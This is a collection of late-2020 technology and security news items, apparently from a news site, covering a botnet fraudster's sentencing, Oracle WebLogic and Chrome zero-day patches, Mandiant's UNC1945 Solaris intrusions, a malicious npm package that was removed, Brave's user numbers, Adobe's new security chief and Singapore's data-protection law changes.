Information Technology

A Russian cybercriminal has been jailed for eight years for participating in a botnet scheme that caused at least $100 million in financial damage. 

According to the US Department of Justice (DoJ), Aleksandr Brovko was an active member of “several elite, online forums designed for Russian-speaking cybercriminals to gather and exchange their criminal tools and services.”
The 36-year-old, formerly of the Czech Republic, worked with other cybercriminals to scrape information gathered by botnets. 
Brovko wrote scripts able to parse log data from botnet sources and then searched these data dumps to uncover personally identifiable information (PII) and account credentials. 
See also: KashmirBlack botnet behind attacks on CMSs like WordPress, Joomla, Drupal, others
Any account credentials logged by Brovko’s code would then be verified by the Russian national — sometimes manually — to see if it was “worthwhile” using the accounts to conduct fraudulent transactions, prosecutors say. If so, bank accounts would be pillaged by other threat actors and drained of funds. 
“Brovko possessed and trafficked over 200,000 unauthorized access devices during the course of the conspiracy,” the DoJ says. “These access devices consisted of either personally identifying information or financial account details.”

Brovko participated in the scheme from 2007 through 2019. He has pleaded guilty to conspiracy to commit bank and wire fraud and was sentenced to eight years in prison by Senior US District Judge T.S. Ellis III. 
TechRepublic: Hackers have only just wet their whistle. Expect more ransomware and data breaches in 2021
As noted by The Register, Brovko’s indictment (.PDF) reveals he was retained by co-conspirator Alexander Tverdokhlebov, who was jailed for over nine years in 2017 after pleading guilty to running botnets able to control over half a million compromised PCs. 
“Aleksandr Brovko used his programming skills to facilitate the large-scale theft and use of stolen personal and financial information, resulting in over $100 million in intended loss,” said US Attorney Zachary Terwilliger. “Our office is committed to holding these criminals accountable and protecting our communities as cybercrime becomes an ever more prominent threat.”
CNET: Huawei ban timeline: Chinese company may build a chip plant due to US sanctions
Last month, Imperva researchers released an analysis of a sophisticated botnet now making the rounds in order to target websites via their content management system (CMS) platforms. 
Dubbed KashmirBlack, the botnet began operation in late 2019 and is now able to attack thousands of websites on a daily basis for purposes including cryptocurrency mining, spam, and defacement. 
Previous and related coverage
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Oracle has published on Sunday a rare out-of-band security update to address an incomplete patch for a recently disclosed vulnerability in Oracle WebLogic servers that is currently being actively exploited in real-world attacks.
The new patch (tracked as CVE-2020-14750) adds additional fixes to a first bug (tracked as CVE-2020-14882), originally patched with Oracle’s standard quarterly October 2020 security updates.
CVE-2020-14882 is a dangerous vulnerability that allows attackers to execute malicious code on an Oracle WebLogic server with elevated privileges before the server’s authentication kicks in.
To exploit CVE-2020-14882, an attacker only needs to send a booby-trapped HTTP GET request to the WebLogic server’s management console.

Since exploitation is trivial, proof-of-concept (PoC) exploit code was made public within days after the initial Oracle patch [1, 2, 3, 4, 5].
As it happened many times before, these POCs were quickly adopted by threat actor groups, and last week, SANS ISC reported attacks against WebLogic honeypots.
But even patched systems were not considered safe.

According to Adam Boileau, Principal Security Consultant at Insomnia Sec, the original patch for CVE-2020-14882 could be bypassed if attackers changed the case of a single character in the standard POC exploit.

In Oracle’s rush to fix it, they made a pretty simple error: attackers could avoid the new path traversal blacklist (and thus bypass the patch) by … wait for it… changing the case of a character in their request.https://t.co/fHWPkXCAlm
— Brett Winterford (@breditor) November 3, 2020

The recent attacks and the bypass of the original patch are what drove Oracle to issue a second set of patches on Sunday, in a rare out-of-band security update.
Companies that run WebLogic servers are now advised to install the additional CVE-2020-14750 patch to protect from both the original CVE-2020-14882 exploit and its bypass.
According to security firm Spyse, more than 3,300 WebLogic servers are currently exposed online and considered to be vulnerable to the original CVE-2020-14882 vulnerability.
Obligatory Simpsons meme: More

Image: Brave
Kicking off in 2016, Brave saw its first 1.0 release almost 4 years later, and following another trip around the Sun, it has hit the milestone of 20.5 million active monthly users.
At the same time last year, the browser had 8.7 million active monthly users, and of the 20 million monthly users, 7 million are daily users, which represents more than a doubling of last year’s 3 million.
Brave added that since Apple allowed browsers other than its own to be the default option on iOS, it has seen its iOS user base increase by a third.
One of the touted features of the browser is that it hates ads, and will go out of its way to block them, unless users decide to see Brave-powered advertisements. To that end, Brave has hit “2 billion ad confirmation events” and completed 2,215 campaigns from over 460 companies. The browser maker says its users have a click-through rate of 9%, way and away outstripping industry averages.
The browser also has its own cryptocurrency, Basic Attention Tokens, that users use to “tip” content creators. Thus far, 26 million of the tokens have been sent to creators. At the time of writing, the blockchain-based token is trading for just under 18 cents, meaning $4.6 million has been sent from users.
“Users are fed up with surveillance capitalism, and 20 million people have switched to Brave for an entirely new web ecosystem with an opt-in ad economy that puts them back in control of their browsing experience,” said Brendan Eich, CEO and co-founder of Brave.
“The global privacy movement is gaining traction, and this milestone is just one more step in our journey to make privacy-by-default a standard for all Web users.”

In June, Brave was caught out for auto-completing certain URLs to append a referral id.
Eich said at the time it was a mistake, while others looked at Brave’s source code and found it was doing the same thing to links to Ledger, Trezor, and Coinbase.
“The autocomplete default was inspired by search query clientid attribution that all browsers do, but unlike keyword queries, a typed-in URL should go to the domain named, without any additions. Sorry for this mistake – we are clearly not perfect, but we correct course quickly,” Eich said.
A patch was later made to disable the functionality by default.
While Brave boasts of hitting its 20 million number, Firefox has reported having 10 times that number to sit above 220 million. According to Statcounter, Firefox’s market share is 4%, while Chrome itself has 66% of the market, giving it an install base measured in multiple billions.
Related Coverage More

Former Blizzard Entertainment chief security officer (CSO) Mark Adams was introduced today as Adobe’s new CSO, in a role where he’ll be responsible for guiding the tech giant’s security steps in the company’s upcoming post-Flash era.
Image: Mark Adams (supplied by Adobe)
Adams filled a role left vacant after the departure of long-time industry veteran Brad Arkin, who left Adobe after 12 years (seven as CSO) in March 2020 to join Cisco as its new Chief Security and Trust Officer.
In his new role at Adobe, Adams will be in full control of the company’s security operations and will report to Adobe Chief Technology Officer (CTO) Abhay Parasnis.
“He will work closely with the key cross functional teams such as IT, Product and Legal, to continue to drive and maintain the processes required to help protect Adobe and our customers,” Adobe said today in a prepared statement.
Prior to joining Adobe today, Adams served for four years as CSO with Blizzard Entertainment, one of today’s top game makers, and the company behind market hits like World of Warcraft, Diablo, Overwatch, and StarCraft.
From an outside perspective, Adams’ hiring fits perfectly in Adobe’s current product make-up and future strategies.
The company is set to retire its woefully insecure Flash Player app at the end of the year, a leftover product from a bygone era, and the app that has singlehandedly soiled Adobe’s reputation for more than a decade.

But once retired, the majority of Adobe’s product lines are all modern cloud-centric systems, from the company’s Creative Cloud line to its analytics, marketing, and enterprise solutions.
Most products are built and managed similar to Blizzard’s gaming products and the Battle.net app, with Adams’ experience in cloud security engineering and data privacy and audit/compliance fitting right in with what Adobe needs from a CSO in its post-Flash era.
“Suffice it to say that I feel hugely honored to take on this role,” Adams wrote today on LinkedIn, following his first day on the job. More

Image: Google
Google has released a security update today for its Chrome web browser that patches ten security bugs, including one zero-day vulnerability that is currently actively exploited in the wild.

Identified as CVE-2020-16009, the zero-day was discovered by Google’s Threat Analysis Group (TAG), a security team at Google tasked with tracking threat actors and their ongoing operations.
In typical Google fashion, details about the zero-day and the group exploiting the bug have not been made public — as a way to allow Chrome users more time to install the updates and prevent other threat actors from developing their own exploits for the same zero-day.
However, in a short changelog published today, Google said the zero-day resides in V8, the Chrome component that handles JavaScript code.
Chrome users are advised to update their browser to version 86.0.4240.183 or later.
Second zero-day in two weeks
This is the second Chrome zero-day that Google found exploited in the wild in the past two weeks.
On October 20, Google also released a security update for Chrome to patch CVE-2020-15999, a zero-day in Chrome’s FreeType font rendering library.

As Google revealed last week on Friday, this Chrome zero-day was utilized together with a Windows zero-day (CVE-2020-17087).
The Chrome zero-day was used to execute malicious code inside Chrome, while the Windows zero-day was used to elevate the code’s privileges and attack the underlying Windows OS. Microsoft is expected to patch this zero-day on November 10, during the company’s next Patch Tuesday.
Google didn’t clarify if these two zero-days were abused by the same threat actor. More

Mandiant, the investigations unit of security firm FireEye, has published details today about a new threat actor it calls UNC1945 that the security firm says it used a zero-day vulnerability in the Oracle Solaris operating system as part of its intrusions into corporate networks.

Regular targets of UNC1945 attacks included the likes of telecommunications, financial, and consulting companies, the Mandiant team said in a report published today.
Old group, new zero-day 
While UNC1945 activity went as far back as 2018, Mandiant said the group caught their eye earlier this year after the threat actor utilized a never-before-seen vulnerability in the Oracle Solaris operating system.
Tracked as CVE-2020-14871, the zero-day was a vulnerability in the Solaris Pluggable Authentication Module (PAM) that allowed UNC1945 to bypass authentication procedures and install a backdoor named SLAPSTICK on internet-exposed Solaris servers.
Mandiant said the hackers then used this backdoor as an entry point to launch reconnaissance operations inside corporate networks and move laterally to other systems.
To avoid detection, Mandiant said the group downloaded and installed a QEMU virtual machine running a version of the Tiny Core Linux OS.
This custom-made Linux VM came pre-installed with several hacking tools like network scanners, password dumpers, exploits, and reconnaissance toolkits that allowed UNC1945 to scan a company’s internal network for weaknesses and move laterally to multiple systems, regardless if they ran Windows or *NIX-based systems.

Image: FireEye

Mandiant said it observed the group using an assortment of open-source penetration testing and security tools, but also custom malware strains.
The open-source toolkits included the likes of Mimikatz, Powersploit, Responder, Procdump, CrackMapExec, PoshC2, Medusa, and the JBoss Vulnerability Scanner, all well-known in the cyber-security industry.
But UNC1945 also showed the ability to create and operate custom malware, with Mandiant linking UNC1945 intrusions to (new and old) malware strains like:
EVILSUN – a remote exploitation tool that gains access to Solaris 10 and 11 systems of SPARC or i386 architecture using a vulnerability (CVE-2020-14871) exposed by SSH keyboard-interactive authentication. The remote exploitation tool makes SSH connections to hosts passed on the command line. The default port is the normal SSH port (22), but this may be overridden. EVILSUN passes the banner string SSH-2.0-Sun_SSH_1.1.3 over the connection in clear text as part of handshaking.
LEMONSTICK – a Linux executable command line utility with backdoor capabilities. The backdoor can execute files, transfer files, and tunnel connections. LEMONSTICK can be started in two different ways: passing the `-c` command line argument (with an optional file) and setting the ‘OCB’ environment variable. When started with the `-c` command line argument, LEMONSTICK spawns an interactive shell. When started in OCB mode, LEMONSTICK expects to read from STDIN. The STDIN data is expected to be encrypted with the blowfish algorithm. After decrypting, it dispatches commands based on the name—for example: ‘executes terminal command’, ‘connect to remote system’, ‘send & retrieve file’, ‘create socket connection’.
LOGBLEACH – an ELF utility that has a primary functionality of deleting log entries from a specified log file(s) based on a filter provided via command line. 
OKSOLO – a publicly available backdoor that binds a shell to a specified port. It can be compiled to support password authentication or dropped into a root shell.
OPENSHACKLE – a reconnaissance tool that collects information about logged-on users and saves it to a file. OPENSHACKLE registers Windows Event Manager callback to achieve persistence.
ProxyChains – allows the use of SSH, TELNET, VNC, FTP and any other internet application from behind HTTP (HTTPS) and SOCKS (4/5) proxy servers. This “proxifier” provides proxy server support to any application.
PUPYRAT (aka Pupy) – an open source, multi-platform (Windows, Linux, OSX, Android), multi-function RAT (Remote Administration Tool) and post-exploitation tool mainly written in Python. It features an all-in-memory execution guideline and leaves very low footprint. It can communicate using various transports, migrate into processes (reflective injection), and load remote Python code, Python packages and Python C-extensions from memory.
STEELCORGI – a packer for Linux ELF programs that uses key material from the executing environment to decrypt the payload. When first starting up, the malware expects to find up to four environment variables that contain numeric values. The malware uses the environment variable values as a key to decrypt additional data to be executed.
SLAPSTICK – a Solaris PAM backdoor that grants a user access to the system with a secret, hard-coded password.
TINYSHELL – a lightweight client/server clone of the standard remote shell tools (rlogin, telnet, ssh, etc.), which can act as a backdoor and provide remote shell execution as well as file transfers.
Zero-day bought off the black market?
Mandiant said it believes that UNC1945 bought EVILSUN (the tool that allowed them to exploit the Solaris zero-day and plant the SLAPSTICK backdoor) from a public hacking forum.
The company said it identified an ad in April 2020 on a black-market website that promoted an “Oracle Solaris SSHD Remote Root Exploit” for $3,000.
Mandiant said it reported the Solaris zero-day to Oracle earlier this year, after discovering traces of exploitation during an investigation.
The zero-day (CVE-2020-14871) was patched last month in Oracle’s October 2020 security patches.
Mandiant said that while UNC1945 has been active for several years, it spotted the Solaris zero-day in one confirmed breach; however, this doesn’t mean the zero-day wasn’t exploited against other corporate networks.
The security firm said it “did not observe evidence of data exfiltration and was unable to determine UNC1945’s mission for most of the intrusions [they] investigated.”
In one UNC1945 intrusion, ransomware was deployed as a final payload, but Mandiant couldn’t link the ransomware attack to UNC1945 directly, and “is likely that access to the victim environment was sold to another group.”
Indicators of compromise and other technical details describing UNC1945 operations and intrusion patterns are available for defenders in the Mandiant report here. More

Image: npm, Armand Khoury, ZDNet
The npm security team has removed today a malicious JavaScript library from the npm website that contained malicious code for opening backdoors on programmers’ computers.

The JavaScript library was named “twilio-npm,” and its malicious behavior was discovered over the weekend by Sonatype, a company that monitors public package repositories as part of its developer security operations (DevSecOps) services.
In a report published today, Sonatype said the library was first published on the npm website on Friday, was discovered on the same day, and removed today after the npm security team blacklisted the package.
Despite a short lifespan on the npm portal, the library was downloaded more than 370 times and automatically included in JavaScript projects built and managed via the npm (Node Package Manager) command-line utility.
Ax Sharma, the Sonatype security researcher who discovered and analyzed the library, said the malicious code found in the fake Twilio library opened a TCP reverse shell on all computers where the library was downloaded and imported inside JavaScript/npm/Node.js projects.
The reverse shell opened a connection to “4.tcp.ngrok[.]io:11425” from where it waited to receive new commands to run on the infected users’ computers.
Sharma said the reverse shell only worked on UNIX-based operating systems.
Developers asked to change credentials, secrets, keys

“Any computer that has this package installed or running should be considered fully compromised,” the npm security team said today, confirming Sonatype’s investigation.
“All secrets and keys stored on that computer should be rotated immediately from a different computer,” the npm team added.
This marks the fourth major takedown of a malicious npm package over the past three months.
In late August, the npm staff removed a malicious npm (JavaScript) library designed to steal sensitive files from an infected users’ browser and Discord application.
In September, npm staff removed four npm (JavaScript) libraries for collecting user details and uploading the stolen data to a public GitHub page.
In October, the npm team removed three npm (JavaScript) packages that were also caught opening reverse shells (backdoors) on developer computers. The three packages were also discovered by Sonatype. Unlike the one discovered over the weekend, these three also worked on Windows systems, and not just UNIX-like systems. More

Singapore has updated its Personal Data Protection Act (PDPA) to allow local businesses to use consumer data without prior consent for some purposes, such as business improvement and research. The amendments also allow for harsher financial penalties to be meted out for data breaches, above the previous cap of SG$1 million. 
The changes were passed in parliament Monday, some 12 years after the legislation was introduced in October 2012. The Act is administered by the Personal Data Protection Commission (PDPC).
In his speech discussing the amendments, Singapore’s Communications and Information Minister S. Iswaran said data was a key economic asset in the digital economy, providing valuable insights that informed businesses and generating efficiencies. 

It also empowered innovation and enhanced products, and was a critical resource for emerging technologies such as artificial intelligence (AI) that held transformative potential, Iswaran said. 
Singapore’s regulatory architecture, therefore, must evolve and keep pace with these shifts, he noted. Pointing to efforts in establishing digital economy agreements, he said such initiatives positioned the Asian nation as “a key node in the global network of digital flow and transactions”. 
The amendments to the PDPA would ensure its legislation regime was “fit for purpose” for a digital economy with a complex data landscape, he said, adding that this must be built on trust. Consumers must have confidence their personal data would be secure and used responsibly, even as they benefitted from digital opportunities and data-driven services, the minister said. 
Companies also needed certainty to harness personal data for legitimate business purposes with the requisite safeguards and accountability, Iswaran said. 

He noted that the amendments sought to strike a balance to maximise the benefit and minimise the risk of collecting and using personal data. 
Amongst the key changes is the “exceptions to the consent” requirement, which now allows businesses to use, collect, and disclose data for “legitimate purposes”, business improvement, and a wider scope of research and development. In addition to existing consent exceptions that include for the purposes of investigations and responding to emergencies, these also now include efforts to combat fraud, enhance products and services, and carry out market research to understand potential customer segments. 
In addition, further amendments defined under “deemed consent” to PDPA now would permit organisations to share data with external contractors for the purpose of fulfilling customer contracts. This catered to “modern commercial arrangements” and essential purposes including security, he said.
Businesses also would be able to use data without consent to facilitate research and development (R&D) that might not yet be marked for productisation. 
Iswaran explained that this could apply to research institutes running scientific R&D or educational institutes taking on social sciences research, as well as enterprises carrying out market research to identify and understand potential customer segments.
All other purposes outside of “deemed” and “exceptions” to consent, such as direct marketing messages, still would require prior consent from consumers. 
Organisations that experienced data breaches and faced potential financial penalties, now might have to fork out heftier sums under an amendment that allowed for fines of up to 10% of a company’s annual turnover, or SG$1 million ($735,490), whichever was higher. Financial penalties previously were capped at SG$1 million. 
Amendments also had been introduced to give consumers greater autonomy over data generated by their use of services an dmore control over how they received commercial communications. 
A new data portability obligation would allow individuals to request for copy of their data to be transmitted to another organisation. This was expected to spur competition and benefit consumers by encouraging the development of substitute or normal services. 
Because it was a relatively new concept in Singapore, Iswaran said data portability would be rolled out in phases. More details would be announced at a later stage, including the categories of data that should be portable as well as other technical and consumer protection guidelines.
Several Members of Parliament expressed concerns that the amendments, specifically with regards to exceptions and deemed consent, would be too broad and might be abused by organisations. 

“Legitimate interests”, for instance, could be viewed from an organisation’s perspective and its assessment subjective when considering whether these interests outweighed potential adverse effects on an individual, which was a requirement outlined in the amendment.
In response, Iswaran said the use of data under deemed or exception to consent would be tagged with safeguards, such as requiring companies to perform risk assessments in determining what was “legitimate” and putting clear limits on how the data could be used. 
“[To tap the exceptions consent], organisations must conduct an assessment to eliminate or reduce risks associated with the collection, use, or disclosure of personal data, and must be satisfied that the overall benefit of doing so outweighs any residual adverse effect on an individual,” he said, adding that the PDPC would outlined guidelines on how companies should carry out the risk assessment. 
He added that individuals still could withdraw consent even after the opt-out period. 
In summing up the objectives of the amendments, the minister said a “delicate balance” was critical because overcorrecting would result in an erosion of consumer trust, while going the other direction would shackle businesses and diminish the benefits on innovation and economy the government hoped to achieve. 
Noting that legislations were not “panacea” and could not eliminate the risk of data breaches, Iswaran said Singapore must remain nimble and interoperable
Laws must be complemented with good practices and these must evolve over time, he added. He urged the need for everyone to play a role and take responsibility for maintaining the security and usability of the country’s data regime. 
He said the government formulated and enforced rules, and aimed to adapt to changing market conditions to ensure Singapore remained relevant amidst new digital requirements. Businesses, too, should recognise it was in their own interests to support a robust data regime and differentiate themselves with their data policy. 
Consumers also should assume responsibility for their own data and, ultimately, had the choice of opting out anytime.
According to the minister, the PDPC last year investigated 185 cases involving data breaches and issued 58 decisions. It ordered 39 organisations to pay SG$1.7 million in penalties, including the highest fines of SG$750,000 and SG$250,000, which were meted out to Integrated Health Information Systems and Singapore Health Services, respectively. 
RELATED COVERAGE More